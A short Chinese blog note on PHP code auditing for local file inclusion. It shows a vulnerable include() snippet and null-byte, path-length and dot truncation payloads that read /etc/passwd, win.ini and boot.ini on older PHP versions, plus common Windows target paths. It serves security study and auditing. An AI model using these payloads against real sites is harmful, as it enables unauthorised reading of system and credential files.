PHP代码审计笔记--文件包含漏洞

 

 

有限制的本地文件包含:

php
include($_GET['file'].".php"); 
?>

%00截断:

?file=C://Windows//win.ini%00    (window,magic_quotes_gpc=off,网络上盛传PHP小于5.3.4有效,未完全进行测试,亲测 PHP 5.2.17有效,PHP-5.3.29-nts无效)

?file==../../../../../../../../../etc/passwd%00   (需要 magic_quotes_gpc=off,PHP小于5.3.4有效)

路径长度截断:

?file=../../../../../../../../../etc/passwd/././././././.[…]/./././././.(php版本小于5.2.8(?)可以成功,linux需要文件名长于4096,windows需要长于256)

点号截断:

?file=../../../../../../../../../boot.ini/………[…]…………(php版本小于5.2.8(?)可以成功,只适用windows,点号需要长于256)

 

 

 

window常见包含路径:

C:\boot.ini

C:\Windows\win.ini

C:\Windows\system.ini

 

最后

欢迎关注个人微信公众号:Bypass--,每周原创一篇技术干货。 

PHP代码审计笔记--文件包含漏洞_第1张图片

 

 http://blog.csdn.net/wangjian1012/article/details/51581440

详解php文件包含原理(读取文件源码、图片马、各种协议、远程getshell等)

https://bbs.ichunqiu.com/thread-28688-1-1.html?from=sec

你可能感兴趣的:(PHP代码审计笔记--文件包含漏洞)